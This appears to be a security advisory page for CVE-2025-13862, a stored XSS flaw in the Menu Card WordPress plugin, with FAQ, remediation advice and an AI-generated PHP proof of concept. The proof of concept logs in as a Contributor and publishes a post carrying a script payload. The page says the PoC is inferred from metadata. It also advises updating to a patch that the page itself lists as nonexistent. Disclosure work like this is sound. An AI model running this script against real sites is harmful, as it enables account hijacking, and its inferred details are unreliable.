What is CVE-2025-13862?

CVE-2025-13862 is a stored cross-site scripting (XSS) vulnerability in the Menu Card plugin for WordPress, affecting all versions up to and including 0.8.0. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘category’ parameter in shortcodes.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the shortcode handling of the Menu Card plugin. An attacker can create or edit a post, inserting a malicious payload in the ‘category’ attribute, which is then stored and executed when other users view the page.

Who is affected by this vulnerability?

Any WordPress site using the Menu Card plugin version 0.8.0 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the Menu Card plugin is installed and check its version. If it is version 0.8.0 or lower, your site is vulnerable to CVE-2025-13862.

What is the severity of this vulnerability?

CVE-2025-13862 has a CVSS score of 6.4, categorized as medium severity. This indicates a moderate risk, where successful exploitation could lead to client-side code execution and potential data theft.

How can I fix or mitigate this issue?

To mitigate the vulnerability, update the Menu Card plugin to the latest version where the issue is patched. Additionally, ensure that all shortcode attributes are properly sanitized and escaped in your code.

What does output escaping involve?

Output escaping involves using functions like esc_attr() or esc_html() to ensure that any user input is properly encoded before being rendered in the browser. This prevents the execution of injected scripts.

What is the impact of successful exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the browsers of users viewing the affected page. This could lead to session hijacking, unauthorized actions, or redirection to malicious sites.

How does the proof of concept demonstrate the issue?

The proof of concept simulates an authenticated Contributor user injecting a malicious payload via the ‘category’ attribute. It highlights how an attacker can exploit the vulnerability by crafting a shortcode that executes JavaScript when the page is viewed.

Can this vulnerability lead to privilege escalation?

Yes, if an attacker with Contributor access exploits this vulnerability, they may target higher-privileged users, such as administrators, potentially leading to full site compromise.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Menu Card plugin until a patch is applied. Additionally, review user roles and permissions to limit access to only trusted users.

Where can I find more information about CVE-2025-13862?

More information about CVE-2025-13862 can be found in the official CVE database, security advisories from the WordPress community, and detailed analyses from security research firms.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13862: Menu Card <= 0.8.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (menu-card)

CVE ID CVE-2025-13862

Plugin menu-card

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 0.8.0

Patched Version —

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13862 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Menu Card WordPress plugin, affecting all versions up to and including 0.8.0. The issue resides in the plugin’s shortcode handler, specifically within the processing of the ‘category’ attribute. Attackers with Contributor-level access or higher can inject malicious scripts that persist in the site’s content, executing whenever a user views the compromised page.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for the ‘category’ shortcode attribute. The CWE-79 classification confirms a failure to neutralize user input before it is placed into web page output. Without a code diff, this conclusion is based on the vulnerability description and the common WordPress pattern where shortcode attributes are processed via the `shortcode_atts()` function and later echoed without proper escaping functions like `esc_attr()` or `esc_html()`.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker would create or edit a post or page, inserting the vulnerable shortcode with a malicious JavaScript payload in its ‘category’ attribute. A typical payload would resemble `[menu_card category=”alert(document.domain)”]`. Upon saving the post, the payload is stored in the database. The script executes in the browsers of any user who views the page containing the shortcode, including administrators.

Remediation requires implementing proper output escaping. The fix should ensure all shortcode attribute values passed to rendering functions are escaped with context-appropriate functions like `esc_attr()` for HTML attributes or `esc_html()` for text nodes before being output. Input validation or sanitization using functions like `sanitize_text_field()` on the attribute during processing would provide an additional layer of security. The patched version would apply these measures to the shortcode handler function.

The impact of successful exploitation is client-side code execution within the victim’s browser session. Attackers can steal session cookies, perform actions on behalf of the user, deface pages, or redirect users to malicious sites. For Contributor-level attackers, this vulnerability can facilitate privilege escalation by targeting administrative users, potentially leading to full site compromise.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13862 - Menu Card <= 0.8.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
<?php
/**
 * Proof-of-Concept for CVE-2025-13862.
 * This script simulates an authenticated Contributor user injecting a stored XSS payload
 * via the 'category' attribute of the Menu Card shortcode.
 * Assumptions:
 * 1. The target site has the Menu Card plugin (<=0.8.0) installed.
 * 2. Valid Contributor-level credentials are available.
 * 3. The plugin's shortcode is registered under 'menu_card' (inferred from plugin slug).
 * 4. The site uses the standard WordPress admin and posting endpoints.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$username = 'contributor_user';      // CHANGE THIS
$password = 'contributor_pass';      // CHANGE THIS

// Payload to inject. This will execute an alert in the victim's browser.
// In a real attack, this could be replaced with cookie theft or other malicious JavaScript.
$xss_payload = '<script>alert(`Atomic Edge Research - XSS via ${document.domain}`)</script>';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Check for login success by looking for a dashboard redirect or absence of login form
if (strpos($response, 'dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('[-] Authentication failed. Check credentials.');
}
echo '[+] Authentication successful.n';

// Step 2: Create a new post as a Contributor. Contributors can edit their own posts.
$post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract the nonce for creating a post. Look for the '_wpnonce' field in the form.
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $nonce_matches);
if (empty($nonce_matches[1])) {
    die('[-] Could not extract nonce for post creation.');
}
$nonce = $nonce_matches[1];

// Step 3: Submit the post with the malicious shortcode.
$save_post_url = $target_url . '/wp-admin/post.php';
$post_data = [
    'post_title' => 'Test Post with XSS',
    'content' => '[menu_card category="' . $xss_payload . '"]', // The vulnerable shortcode
    'post_type' => 'post',
    'post_status' => 'publish', // Contributor posts require review, but the payload is stored.
    '_wpnonce' => $nonce,
    'post_format' => '0',
    'action' => 'editpost',
    'post_ID' => '2', // May need adjustment; often a draft ID is created in step 2.
    'save' => 'Publish'
];
// For Contributors, status will likely be set to 'pending' automatically.
// The payload is stored regardless of status.
curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Check for success (redirect to post list or edit screen)
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false || strpos($response, 'post.php?action=edit') !== false) {
    echo '[+] Post created/updated with malicious shortcode.n';
    echo '[+] Stored XSS payload: ' . $xss_payload . 'n';
    echo '[+] The script will execute when any user views the post.n';
} else {
    echo '[-] Post submission may have failed. Check response.n';
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-13862?
Overview of the vulnerability
CVE-2025-13862 is a stored cross-site scripting (XSS) vulnerability in the Menu Card plugin for WordPress, affecting all versions up to and including 0.8.0. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘category’ parameter in shortcodes.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the shortcode handling of the Menu Card plugin. An attacker can create or edit a post, inserting a malicious payload in the ‘category’ attribute, which is then stored and executed when other users view the page.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Menu Card plugin version 0.8.0 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Steps for assessment
To check if your site is vulnerable, verify if the Menu Card plugin is installed and check its version. If it is version 0.8.0 or lower, your site is vulnerable to CVE-2025-13862.
What is the severity of this vulnerability?
Understanding the risk level
CVE-2025-13862 has a CVSS score of 6.4, categorized as medium severity. This indicates a moderate risk, where successful exploitation could lead to client-side code execution and potential data theft.
How can I fix or mitigate this issue?
Recommended actions
To mitigate the vulnerability, update the Menu Card plugin to the latest version where the issue is patched. Additionally, ensure that all shortcode attributes are properly sanitized and escaped in your code.
What does output escaping involve?
Technical details on remediation
Output escaping involves using functions like esc_attr() or esc_html() to ensure that any user input is properly encoded before being rendered in the browser. This prevents the execution of injected scripts.
What is the impact of successful exploitation?
Consequences of the vulnerability
If exploited, an attacker can execute arbitrary JavaScript in the browsers of users viewing the affected page. This could lead to session hijacking, unauthorized actions, or redirection to malicious sites.
How does the proof of concept demonstrate the issue?
Understanding the demonstration code
The proof of concept simulates an authenticated Contributor user injecting a malicious payload via the ‘category’ attribute. It highlights how an attacker can exploit the vulnerability by crafting a shortcode that executes JavaScript when the page is viewed.
Can this vulnerability lead to privilege escalation?
Potential for increased access
Yes, if an attacker with Contributor access exploits this vulnerability, they may target higher-privileged users, such as administrators, potentially leading to full site compromise.
What should I do if I cannot update the plugin immediately?
Temporary measures
If an immediate update is not possible, consider disabling the Menu Card plugin until a patch is applied. Additionally, review user roles and permissions to limit access to only trusted users.
Where can I find more information about CVE-2025-13862?
Resources for further reading
More information about CVE-2025-13862 can be found in the official CVE database, security advisories from the WordPress community, and detailed analyses from security research firms.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations